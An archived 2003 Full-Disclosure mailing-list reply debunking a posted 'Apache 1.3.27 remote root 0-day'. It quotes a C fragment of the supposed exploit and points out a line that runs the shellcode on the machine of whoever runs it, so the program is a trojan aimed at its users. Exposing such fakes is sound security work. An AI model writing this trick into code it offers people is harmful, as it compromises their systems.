lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <200306201216.33887.xbud@g0thead.com>
From: xbud at g0thead.com (xbud)
Subject: Apache 1.3.27 Remote Root 0-Day

umm useless attempt at humiliating people.

memcpy(&buffer[512 - strlen(shellcode)], shellcode,
           strlen(shellcode));
    buffer[512 + 1024] = ';';
    buffer[512 + 1024 + 1] = '\0';
    void(*b)()=(void*)shellcode;b();			<---- Executes shellcode. 
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("Server doesn't exist\n");
        exit(1);
    }

Michael - Learn to read code...

On Friday 20 June 2003 16:06, Andreas Gietl wrote:
> Michael <mike-full@...aglobal.net> wrote :
>
> i don't actually think apache could be root-exploited directly, since it
> has no suid-bit and does usually not run as root. This was why i did not
> react to it.
>
> Maybe the author wanted to report a new worm that first exploits apache and
> then does a local-root-exploit.
>
> But i don't believe a direct apache-root-exploit exists, unless apache is
> misconfigured or using suexec or kind of that.
>
> > Maybe now we can STFU and concentrate on actual disclosure?
> > I'm curious as to why there has been no discussion about this apache
> > report.
> >
> > The poster of this message didnt include any info on the details of the
> > problem
> > nor an exploit, which leaves us wondering.  (The insult was cute though)
> >
> > This could be some serious isht if indeed it is true.
> >
> > Can anyone confirm/dispute?
> >
> >
> > -M
> >
> > --
> > . Michael Jastremski
> > .............................................................
> > .. Network Engineer &gt; Megaglobal Networks &gt; Megaglobal.net
> > .......................
> > ...... Photographer &gt; Open Photo Project  &gt; Openphoto.net
> > ........................
> > .......... Resident &gt; West Philadelphia   &gt; Westphila.net
> > ........................
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
------------------------------
Orlando Padilla
http://www.g0thead.com/xbud.asc
"I only drink to make other people interesting" 
------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ